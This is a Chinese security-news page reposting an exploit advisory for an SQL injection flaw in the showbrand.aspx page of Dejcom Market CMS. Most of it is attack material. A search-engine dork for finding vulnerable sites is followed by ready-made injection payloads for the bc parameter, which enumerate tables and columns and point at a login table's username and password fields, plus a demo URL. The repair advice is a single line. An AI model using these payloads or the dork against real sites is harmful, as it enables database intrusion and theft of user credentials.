频道栏目
首页 > 资讯 > 网站安全 > 正文

Dejcom Market CMS (showbrand.aspx) SQL 注入及修复

12-09-28        来源:[db:作者]  
收藏   我要投稿

发布作者:Mormoroth

影响版本:ALL Version
漏洞类型:SQL注入
漏洞描述:Dejcom Market CMS showbrand.aspx页面参数未经过严格过滤,导致SQL注入漏洞产生。

Dork : "Powered By Dejcom Market CMS"

Exploit:

%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge,COMMENTS,filegroup,files,groups,khabarname,khat,links,login))--

showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name=loguser and column_name not in(code,username,pass))--

 Demo : http://www.2cto.com /showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge))--

www.2cto.com修复方案:

showbrand.aspx页面参数严格过滤

相关TAG标签
上一篇:HOWTO: 在本地配置名字服务器并启用 DNSSEC
下一篇:虚拟机下Linux访问Windows最简办法
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站